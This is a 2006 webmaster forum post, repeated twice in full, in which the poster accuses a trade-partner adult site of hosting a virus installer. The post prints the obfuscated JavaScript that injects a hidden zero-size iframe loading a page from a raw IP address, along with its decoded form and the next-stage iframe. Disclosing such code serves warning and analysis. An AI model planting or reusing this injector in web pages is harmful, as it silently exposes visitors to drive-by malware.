Dan S
09-06-2006, 11:46 PM
I was thinking a LONG time this morning if I should hit the boards with the drama or not. I decided that it is just what I have to do.
sextasya.com is one of my top trades and I lost it this morning because I had to pull the plug on a shameless attempt to screw me and others over. So I feel like if I lose my top trade he should lose all of his too.
I came in this morning and checking my sites, like every morning. Clicking around when I got hit with virus warnings on sextasya.com. 2 different but related warnings.
Screens:
http://www.hardsextacy.com/sextasya1.jpg
http://www.hardsextacy.com/sextasya2.jpg
(kapersky is in german, but you get the idea)
So, starting to look at the source of the site you can spot this code after the body tag:
<SCRIPT LANGUAGE="JavaScript">document.write('<'+'if'+'ra'+'me'+' '+'sr'+'c=ht'+'tp'+':/'+'/21'+'3'+'.'+'25'+'1'+'.'+'13'+'2'+'.'+'19'+'4'+'/su'+'p'+'port'+'/'+'sup'+'p'+'ort'+'.'+'p'+'hp fra'+'mebo'+'rder=0 he'+'ight'+'='+'0 wid'+'th='+'0'+'>'+'<'+'/'+'if'+'ra'+'me'+'>');</SCRIPT>
which cleaned up makes this:
<SCRIPT LANGUAGE="JavaScript">document.write('<iframe src=http://213.251.132.194/support/support.php frameborder=0 height=0 width=0></iframe>');</SCRIPT>
if you go to http://213.251.132.194/support/support.php directly, you get the same virus warning as on sextasya.com main page and you find this source:
<iframe src=install.html></iframe>
I thought, ok, maybe its some weird advertiser who is poping up shit on a fellow webmaster. So I contacted him to explain. Apperently he wasnt online at that time and actually the shit is still there as I am writing this.
So far I gave the benefit of doubt, since we trade already quite some time and the trade really kicked in.
I did some searches on the IP, to find what virus we are talking about maybe, when I seen that his ST thumbs are on the same IP.
http://213.251.132.194/sextasya.com/st/thumbs/
So this fucking virus installer is on his server.
Almost makes me puke.
Say bye bye to a 50k trade.
A nice fuck you is all I can say.
sextasya.com is one of my top trades and I lost it this morning because I had to pull the plug on a shameless attempt to screw me and others over. So I feel like if I lose my top trade he should lose all of his too.
I came in this morning and checking my sites, like every morning. Clicking around when I got hit with virus warnings on sextasya.com. 2 different but related warnings.
Screens:
http://www.hardsextacy.com/sextasya1.jpg
http://www.hardsextacy.com/sextasya2.jpg
(kapersky is in german, but you get the idea)
So, starting to look at the source of the site you can spot this code after the body tag:
<SCRIPT LANGUAGE="JavaScript">document.write('<'+'if'+'ra'+'me'+' '+'sr'+'c=ht'+'tp'+':/'+'/21'+'3'+'.'+'25'+'1'+'.'+'13'+'2'+'.'+'19'+'4'+'/su'+'p'+'port'+'/'+'sup'+'p'+'ort'+'.'+'p'+'hp fra'+'mebo'+'rder=0 he'+'ight'+'='+'0 wid'+'th='+'0'+'>'+'<'+'/'+'if'+'ra'+'me'+'>');</SCRIPT>
which cleaned up makes this:
<SCRIPT LANGUAGE="JavaScript">document.write('<iframe src=http://213.251.132.194/support/support.php frameborder=0 height=0 width=0></iframe>');</SCRIPT>
if you go to http://213.251.132.194/support/support.php directly, you get the same virus warning as on sextasya.com main page and you find this source:
<iframe src=install.html></iframe>
I thought, ok, maybe its some weird advertiser who is poping up shit on a fellow webmaster. So I contacted him to explain. Apperently he wasnt online at that time and actually the shit is still there as I am writing this.
So far I gave the benefit of doubt, since we trade already quite some time and the trade really kicked in.
I did some searches on the IP, to find what virus we are talking about maybe, when I seen that his ST thumbs are on the same IP.
http://213.251.132.194/sextasya.com/st/thumbs/
So this fucking virus installer is on his server.
Almost makes me puke.
Say bye bye to a 50k trade.
A nice fuck you is all I can say.